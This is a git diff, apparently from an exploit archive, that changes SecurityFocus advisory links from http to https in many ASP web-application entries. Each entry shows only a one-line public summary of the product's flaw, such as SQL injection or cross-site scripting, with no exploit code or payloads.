http://www.securityfocus.com/bid/27419/info +source: https://www.securityfocus.com/bid/27419/info Web Wiz Forums, NewsPad, and Rich Text Editor are prone to a remote information-disclosure vulnerability because they fail to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/31058.txt b/exploits/asp/webapps/31058.txt index 57140fe23..d5d0c6590 100644 --- a/exploits/asp/webapps/31058.txt +++ b/exploits/asp/webapps/31058.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27450/info +source: https://www.securityfocus.com/bid/27450/info Pre Hotel and Resorts is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/31059.txt b/exploits/asp/webapps/31059.txt index c45e79bc1..655b91f06 100644 --- a/exploits/asp/webapps/31059.txt +++ b/exploits/asp/webapps/31059.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27452/info +source: https://www.securityfocus.com/bid/27452/info E-SMART CART is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/31070.txt b/exploits/asp/webapps/31070.txt index 980947492..93b23c1dd 100644 --- a/exploits/asp/webapps/31070.txt +++ b/exploits/asp/webapps/31070.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27474/info +source: https://www.securityfocus.com/bid/27474/info ASPired2Protect is prone to an SQL-injection vulnerability because it fails to adequately sanitize user-supplied data. diff --git a/exploits/asp/webapps/31103.txt b/exploits/asp/webapps/31103.txt index 37d249e47..e562f9f93 100644 --- a/exploits/asp/webapps/31103.txt +++ b/exploits/asp/webapps/31103.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27610/info +source: https://www.securityfocus.com/bid/27610/info AstroSoft HelpDesk is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/31104.txt b/exploits/asp/webapps/31104.txt index 16dd69a1a..b5bf4c390 100644 --- a/exploits/asp/webapps/31104.txt +++ b/exploits/asp/webapps/31104.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27610/info +source: https://www.securityfocus.com/bid/27610/info AstroSoft HelpDesk is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/31117.txt b/exploits/asp/webapps/31117.txt index efb0f2b76..6575a9462 100644 --- a/exploits/asp/webapps/31117.txt +++ b/exploits/asp/webapps/31117.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27654/info +source: https://www.securityfocus.com/bid/27654/info WS_FTP Server Manager is prone to an authentication-bypass vulnerability and an information-disclosure vulnerability. diff --git a/exploits/asp/webapps/31191.txt b/exploits/asp/webapps/31191.txt index 28e2d86d3..f78ff8738 100644 --- a/exploits/asp/webapps/31191.txt +++ b/exploits/asp/webapps/31191.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27779/info +source: https://www.securityfocus.com/bid/27779/info Site2Nite Real Estate Web is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/31275.txt b/exploits/asp/webapps/31275.txt index 9d1a2aa86..2bac23202 100644 --- a/exploits/asp/webapps/31275.txt +++ b/exploits/asp/webapps/31275.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27924/info +source: https://www.securityfocus.com/bid/27924/info Aeries Student Information System is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues and an HTML-injection issue, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/31276.txt b/exploits/asp/webapps/31276.txt index bb0d5d557..81e624b4e 100644 --- a/exploits/asp/webapps/31276.txt +++ b/exploits/asp/webapps/31276.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27924/info +source: https://www.securityfocus.com/bid/27924/info Aeries Student Information System is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues and an HTML-injection issue, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/31286.txt b/exploits/asp/webapps/31286.txt index fbe0c2e8a..e83d112ee 100644 --- a/exploits/asp/webapps/31286.txt +++ b/exploits/asp/webapps/31286.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27948/info +source: https://www.securityfocus.com/bid/27948/info Citrix MetaFrame Web Manager is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/31314.txt b/exploits/asp/webapps/31314.txt index d62751d4a..08acccd0b 100644 --- a/exploits/asp/webapps/31314.txt +++ b/exploits/asp/webapps/31314.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28040/info +source: https://www.securityfocus.com/bid/28040/info Flicks Software AuthentiX is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/31404.txt b/exploits/asp/webapps/31404.txt index f65da08a5..fad400466 100644 --- a/exploits/asp/webapps/31404.txt +++ b/exploits/asp/webapps/31404.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28247/info +source: https://www.securityfocus.com/bid/28247/info Virtual Support Office XP (VSO-XP) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/31413.txt b/exploits/asp/webapps/31413.txt index b9e4e7e34..d60bf7f38 100644 --- a/exploits/asp/webapps/31413.txt +++ b/exploits/asp/webapps/31413.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28279/info +source: https://www.securityfocus.com/bid/28279/info Imperva SecureSphere is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/31442.txt b/exploits/asp/webapps/31442.txt index da578ec0c..8cf7fae47 100644 --- a/exploits/asp/webapps/31442.txt +++ b/exploits/asp/webapps/31442.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28315/info +source: https://www.securityfocus.com/bid/28315/info PortalApp is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/31463.txt b/exploits/asp/webapps/31463.txt index baf2d4238..6b78dbbe7 100644 --- a/exploits/asp/webapps/31463.txt +++ b/exploits/asp/webapps/31463.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28376/info +source: https://www.securityfocus.com/bid/28376/info Iatek Knowledge Base is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/31546.txt b/exploits/asp/webapps/31546.txt index 4e2a1ef05..bf2ca4481 100644 --- a/exploits/asp/webapps/31546.txt +++ b/exploits/asp/webapps/31546.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28475/info +source: https://www.securityfocus.com/bid/28475/info DigiDomain is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/31547.txt b/exploits/asp/webapps/31547.txt index f76b26074..ee832ecc2 100644 --- a/exploits/asp/webapps/31547.txt +++ b/exploits/asp/webapps/31547.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28475/info +source: https://www.securityfocus.com/bid/28475/info DigiDomain is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/31582.txt b/exploits/asp/webapps/31582.txt index a9e266238..f3b2785bd 100644 --- a/exploits/asp/webapps/31582.txt +++ b/exploits/asp/webapps/31582.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28532/info +source: https://www.securityfocus.com/bid/28532/info EfesTECH Video is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/31644.txt b/exploits/asp/webapps/31644.txt index 114755f6c..5b040c248 100644 --- a/exploits/asp/webapps/31644.txt +++ b/exploits/asp/webapps/31644.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28772/info +source: https://www.securityfocus.com/bid/28772/info Cezanne Software is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/31645.txt b/exploits/asp/webapps/31645.txt index 463372c63..37407b6be 100644 --- a/exploits/asp/webapps/31645.txt +++ b/exploits/asp/webapps/31645.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28772/info +source: https://www.securityfocus.com/bid/28772/info Cezanne Software is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/31646.txt b/exploits/asp/webapps/31646.txt index f1fdeff63..729dc7c89 100644 --- a/exploits/asp/webapps/31646.txt +++ b/exploits/asp/webapps/31646.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28772/info +source: https://www.securityfocus.com/bid/28772/info Cezanne Software is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/31648.txt b/exploits/asp/webapps/31648.txt index 1a0900730..02bbdcc7c 100644 --- a/exploits/asp/webapps/31648.txt +++ b/exploits/asp/webapps/31648.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28773/info +source: https://www.securityfocus.com/bid/28773/info Cezanne Software is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/31649.txt b/exploits/asp/webapps/31649.txt index e4939f46f..e2010358e 100644 --- a/exploits/asp/webapps/31649.txt +++ b/exploits/asp/webapps/31649.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28773/info +source: https://www.securityfocus.com/bid/28773/info Cezanne Software is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/31650.txt b/exploits/asp/webapps/31650.txt index ce61fff4d..586e60f2c 100644 --- a/exploits/asp/webapps/31650.txt +++ b/exploits/asp/webapps/31650.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28774/info +source: https://www.securityfocus.com/bid/28774/info Cezanne Software is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/31666.txt b/exploits/asp/webapps/31666.txt index 614c7e35e..394fbf989 100644 --- a/exploits/asp/webapps/31666.txt +++ b/exploits/asp/webapps/31666.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28831/info +source: https://www.securityfocus.com/bid/28831/info CoBaLT is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/asp/webapps/31797.txt b/exploits/asp/webapps/31797.txt index d41ad1af6..41fea9a3a 100644 --- a/exploits/asp/webapps/31797.txt +++ b/exploits/asp/webapps/31797.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29229/info +source: https://www.securityfocus.com/bid/29229/info Philboard is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/31811.txt b/exploits/asp/webapps/31811.txt index dc0ffac5e..6b312e8b2 100644 --- a/exploits/asp/webapps/31811.txt +++ b/exploits/asp/webapps/31811.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29299/info +source: https://www.securityfocus.com/bid/29299/info Site Tanitimlari Scripti is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/31812.txt b/exploits/asp/webapps/31812.txt index 7c6aeadd8..3b5ff373c 100644 --- a/exploits/asp/webapps/31812.txt +++ b/exploits/asp/webapps/31812.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29300/info +source: https://www.securityfocus.com/bid/29300/info DizaynPlus Nobetci Eczane Takip is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/31843.txt b/exploits/asp/webapps/31843.txt index cadc39728..f14310b6c 100644 --- a/exploits/asp/webapps/31843.txt +++ b/exploits/asp/webapps/31843.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29370/info +source: https://www.securityfocus.com/bid/29370/info Excuse Online is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/31850.txt b/exploits/asp/webapps/31850.txt index 3fd2ef856..5ae2e87f6 100644 --- a/exploits/asp/webapps/31850.txt +++ b/exploits/asp/webapps/31850.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29375/info +source: https://www.securityfocus.com/bid/29375/info Campus Bulletin Board is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/31851.txt b/exploits/asp/webapps/31851.txt index d1f588985..fa4bed658 100644 --- a/exploits/asp/webapps/31851.txt +++ b/exploits/asp/webapps/31851.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29375/info +source: https://www.securityfocus.com/bid/29375/info Campus Bulletin Board is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/31852.txt b/exploits/asp/webapps/31852.txt index e64358221..459185fd1 100644 --- a/exploits/asp/webapps/31852.txt +++ b/exploits/asp/webapps/31852.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29375/info +source: https://www.securityfocus.com/bid/29375/info Campus Bulletin Board is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/31854.html b/exploits/asp/webapps/31854.html index 8d0eac738..68a003a3f 100644 --- a/exploits/asp/webapps/31854.html +++ b/exploits/asp/webapps/31854.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29376/info +source: https://www.securityfocus.com/bid/29376/info The Campus Request Repairs System is prone to an unauthorized-access vulnerability because it fails to adequately limit access to administrative scripts used for creating accounts. diff --git a/exploits/asp/webapps/31859.txt b/exploits/asp/webapps/31859.txt index d1f79d553..1b684c9db 100644 --- a/exploits/asp/webapps/31859.txt +++ b/exploits/asp/webapps/31859.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29426/info +source: https://www.securityfocus.com/bid/29426/info JustPORTAL is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/31860.txt b/exploits/asp/webapps/31860.txt index 2e83baa68..8d8ea9cca 100644 --- a/exploits/asp/webapps/31860.txt +++ b/exploits/asp/webapps/31860.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29427/info +source: https://www.securityfocus.com/bid/29427/info Proje ASP Portal is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/31861.txt b/exploits/asp/webapps/31861.txt index b6133aa05..b0b5fb0f4 100644 --- a/exploits/asp/webapps/31861.txt +++ b/exploits/asp/webapps/31861.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29429/info +source: https://www.securityfocus.com/bid/29429/info The 'dvbbs' program is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/31865.txt b/exploits/asp/webapps/31865.txt index 3675da807..c54e137dd 100644 --- a/exploits/asp/webapps/31865.txt +++ b/exploits/asp/webapps/31865.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29437/info +source: https://www.securityfocus.com/bid/29437/info DotNetNuke is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/31869.txt b/exploits/asp/webapps/31869.txt index 53b82d77e..c137d02f1 100644 --- a/exploits/asp/webapps/31869.txt +++ b/exploits/asp/webapps/31869.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29471/info +source: https://www.securityfocus.com/bid/29471/info i-pos Storefront is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/31871.txt b/exploits/asp/webapps/31871.txt index 469054d1f..84e901d8f 100644 --- a/exploits/asp/webapps/31871.txt +++ b/exploits/asp/webapps/31871.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29478/info +source: https://www.securityfocus.com/bid/29478/info Te Ecard is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/31891.txt b/exploits/asp/webapps/31891.txt index e2989728e..a4844f35b 100644 --- a/exploits/asp/webapps/31891.txt +++ b/exploits/asp/webapps/31891.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29612/info +source: https://www.securityfocus.com/bid/29612/info Real Estate Website is prone to multiple input-validation vulnerabilities, including an SQL-injection issue and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/31967.txt b/exploits/asp/webapps/31967.txt index 539245e4a..a6e4dd291 100644 --- a/exploits/asp/webapps/31967.txt +++ b/exploits/asp/webapps/31967.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29957/info +source: https://www.securityfocus.com/bid/29957/info Commtouch Anti-Spam Enterprise Gateway is prone to a cross-site scripting vulnerability because the device fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/32111.txt b/exploits/asp/webapps/32111.txt index 9f7bb51e9..63a60f534 100644 --- a/exploits/asp/webapps/32111.txt +++ b/exploits/asp/webapps/32111.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30349/info +source: https://www.securityfocus.com/bid/30349/info Pre Survey Generator is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/32119.txt b/exploits/asp/webapps/32119.txt index f420b3fe2..f8f07d064 100644 --- a/exploits/asp/webapps/32119.txt +++ b/exploits/asp/webapps/32119.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30398/info +source: https://www.securityfocus.com/bid/30398/info Web Wiz Forums is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/32120.txt b/exploits/asp/webapps/32120.txt index 33e559a93..722541376 100644 --- a/exploits/asp/webapps/32120.txt +++ b/exploits/asp/webapps/32120.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30398/info +source: https://www.securityfocus.com/bid/30398/info Web Wiz Forums is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/32151.pl b/exploits/asp/webapps/32151.pl index 88df1661c..61ba4ff42 100755 --- a/exploits/asp/webapps/32151.pl +++ b/exploits/asp/webapps/32151.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30534/info +source: https://www.securityfocus.com/bid/30534/info Pcshey Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/32184.txt b/exploits/asp/webapps/32184.txt index 9ee1e14bc..81cdca303 100644 --- a/exploits/asp/webapps/32184.txt +++ b/exploits/asp/webapps/32184.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30567/info +source: https://www.securityfocus.com/bid/30567/info KAPhotoservice is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/32185.txt b/exploits/asp/webapps/32185.txt index a4e3b38a1..96b4cf64d 100644 --- a/exploits/asp/webapps/32185.txt +++ b/exploits/asp/webapps/32185.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30567/info +source: https://www.securityfocus.com/bid/30567/info KAPhotoservice is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/32255.txt b/exploits/asp/webapps/32255.txt index 6f751e1b3..4eba9ad93 100644 --- a/exploits/asp/webapps/32255.txt +++ b/exploits/asp/webapps/32255.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30712/info +source: https://www.securityfocus.com/bid/30712/info fipsCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/32278.txt b/exploits/asp/webapps/32278.txt index 370adad31..8b5bf1192 100644 --- a/exploits/asp/webapps/32278.txt +++ b/exploits/asp/webapps/32278.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30745/info +source: https://www.securityfocus.com/bid/30745/info K Web CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/32297.txt b/exploits/asp/webapps/32297.txt index 69d5c81c6..d8929d092 100644 --- a/exploits/asp/webapps/32297.txt +++ b/exploits/asp/webapps/32297.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30841/info +source: https://www.securityfocus.com/bid/30841/info Smart Survey is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/32300.txt b/exploits/asp/webapps/32300.txt index 842e8e11d..8794d9e5a 100644 --- a/exploits/asp/webapps/32300.txt +++ b/exploits/asp/webapps/32300.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30849/info +source: https://www.securityfocus.com/bid/30849/info ASP Search Engine is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/32394.txt b/exploits/asp/webapps/32394.txt index fa2f5f00c..c270b0acb 100644 --- a/exploits/asp/webapps/32394.txt +++ b/exploits/asp/webapps/32394.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31242/info +source: https://www.securityfocus.com/bid/31242/info Sama Educational Management System is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/asp/webapps/32401.txt b/exploits/asp/webapps/32401.txt index fabcb0f3e..e22d3ba55 100644 --- a/exploits/asp/webapps/32401.txt +++ b/exploits/asp/webapps/32401.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31298/info +source: https://www.securityfocus.com/bid/31298/info rgb72 WCMS is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/32412.txt b/exploits/asp/webapps/32412.txt index 59ff05b98..b93e9b925 100644 --- a/exploits/asp/webapps/32412.txt +++ b/exploits/asp/webapps/32412.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31338/info +source: https://www.securityfocus.com/bid/31338/info Omnicom Content Platform is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/asp/webapps/32485.txt b/exploits/asp/webapps/32485.txt index 96d504125..472590b34 100644 --- a/exploits/asp/webapps/32485.txt +++ b/exploits/asp/webapps/32485.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31740/info +source: https://www.securityfocus.com/bid/31740/info ASP Indir Iltaweb Alisveris Sistemi is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/32498.txt b/exploits/asp/webapps/32498.txt index 241e46bea..b35ade895 100644 --- a/exploits/asp/webapps/32498.txt +++ b/exploits/asp/webapps/32498.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31849/info +source: https://www.securityfocus.com/bid/31849/info Dizi Portali is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/32500.txt b/exploits/asp/webapps/32500.txt index 976e78e0f..5738586b1 100644 --- a/exploits/asp/webapps/32500.txt +++ b/exploits/asp/webapps/32500.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31852/info +source: https://www.securityfocus.com/bid/31852/info Bahar Download Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/32549.txt b/exploits/asp/webapps/32549.txt index 4e5b7b1a3..3cad91f19 100644 --- a/exploits/asp/webapps/32549.txt +++ b/exploits/asp/webapps/32549.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31992/info +source: https://www.securityfocus.com/bid/31992/info Dorsa CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/32577.txt b/exploits/asp/webapps/32577.txt index d7b6f983e..72909d673 100644 --- a/exploits/asp/webapps/32577.txt +++ b/exploits/asp/webapps/32577.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32239/info +source: https://www.securityfocus.com/bid/32239/info Dizi Portali is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/32601.txt b/exploits/asp/webapps/32601.txt index 196b934e6..164e39c30 100644 --- a/exploits/asp/webapps/32601.txt +++ b/exploits/asp/webapps/32601.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32526/info +source: https://www.securityfocus.com/bid/32526/info Ocean12 FAQ Manager Pro is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/32602.txt b/exploits/asp/webapps/32602.txt index 85af1994e..fdef055c5 100644 --- a/exploits/asp/webapps/32602.txt +++ b/exploits/asp/webapps/32602.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32527/info +source: https://www.securityfocus.com/bid/32527/info Multiple Ocean12 products are prone to an SQL-injection vulnerability because they fail to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/32603.txt b/exploits/asp/webapps/32603.txt index 3d09d8705..f4df2afcf 100644 --- a/exploits/asp/webapps/32603.txt +++ b/exploits/asp/webapps/32603.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32528/info +source: https://www.securityfocus.com/bid/32528/info Ocean12 Mailing List Manager Gold is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/32604.txt b/exploits/asp/webapps/32604.txt index 15bc97384..c30f86810 100644 --- a/exploits/asp/webapps/32604.txt +++ b/exploits/asp/webapps/32604.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32529/info +source: https://www.securityfocus.com/bid/32529/info ParsBlogger is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/32609.txt b/exploits/asp/webapps/32609.txt index bae427db8..4e61ab7c3 100644 --- a/exploits/asp/webapps/32609.txt +++ b/exploits/asp/webapps/32609.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32566/info +source: https://www.securityfocus.com/bid/32566/info Pre Classified Listings is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/32610.txt b/exploits/asp/webapps/32610.txt index 3939da9fd..b7c765c2f 100644 --- a/exploits/asp/webapps/32610.txt +++ b/exploits/asp/webapps/32610.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32567/info +source: https://www.securityfocus.com/bid/32567/info Pre Classified Listings is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/32611.txt b/exploits/asp/webapps/32611.txt index dcc83ed75..5a74d1d4b 100644 --- a/exploits/asp/webapps/32611.txt +++ b/exploits/asp/webapps/32611.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32568/info +source: https://www.securityfocus.com/bid/32568/info CodeToad ASP Shopping Cart Script is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/32626.txt b/exploits/asp/webapps/32626.txt index fffc4e49f..59d2c7fc7 100644 --- a/exploits/asp/webapps/32626.txt +++ b/exploits/asp/webapps/32626.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32571/info +source: https://www.securityfocus.com/bid/32571/info ASP Forum Script is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/32628.txt b/exploits/asp/webapps/32628.txt index a8a1f74f8..be8bb7b9c 100644 --- a/exploits/asp/webapps/32628.txt +++ b/exploits/asp/webapps/32628.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32571/info +source: https://www.securityfocus.com/bid/32571/info ASP Forum Script is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/32629.txt b/exploits/asp/webapps/32629.txt index 939ca6694..1c5a521bd 100644 --- a/exploits/asp/webapps/32629.txt +++ b/exploits/asp/webapps/32629.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32571/info +source: https://www.securityfocus.com/bid/32571/info ASP Forum Script is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/32630.txt b/exploits/asp/webapps/32630.txt index 7fbf51cce..33413f4be 100644 --- a/exploits/asp/webapps/32630.txt +++ b/exploits/asp/webapps/32630.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32572/info +source: 